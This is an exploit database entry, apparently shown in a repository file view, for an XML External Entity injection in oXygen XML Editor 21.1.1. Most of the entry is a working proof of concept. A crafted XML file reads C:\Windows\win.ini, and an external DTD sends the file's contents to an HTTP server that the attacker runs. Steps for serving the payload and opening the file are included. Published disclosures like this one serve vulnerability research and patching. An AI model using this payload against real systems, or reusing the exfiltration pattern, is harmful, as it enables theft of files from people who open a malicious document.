a981df031a
3 changes to exploits/shellcodes Siemens Desigo PX 6.00 - Denial of Service (PoC) oXygen XML Editor 21.1.1 - XML External Entity Injection Xfilesharing 2.5.1 - Arbitrary File Upload
28 lines
No EOL
745 B
Text
28 lines
No EOL
745 B
Text
# Exploit Title: oXygen XML Editor 21.1.1 - XML External Entity Injection
|
|
# Author: Pablo Santiago
|
|
# Date: 2019-11-13
|
|
# Vendor Homepage: https://www.oxygenxml.com/
|
|
# Source:https://www.oxygenxml.com/xml_editor/download_oxygenxml_editor.html
|
|
# Version: 21.1.1
|
|
# CVE : N/A
|
|
# Tested on: Windows 7
|
|
|
|
#PoC
|
|
|
|
1- python -m SimpleHTTPServer 8000
|
|
1.1- Poc.xml :
|
|
<?xml version="1.0"?>
|
|
<!DOCTYPE test [
|
|
<!ENTITY % file SYSTEM "C:\Windows\win.ini">
|
|
<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
|
|
%dtd;]>
|
|
<pwn>&send;</pwn>
|
|
|
|
1.2.- payload.dtd
|
|
<?xml version="1.0" encoding="UTF-8"?>
|
|
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>">
|
|
%all;
|
|
2- File -> Open -> *.xml
|
|
|
|
#PoC Visual
|
|
https://imgur.com/2H8DhL9 |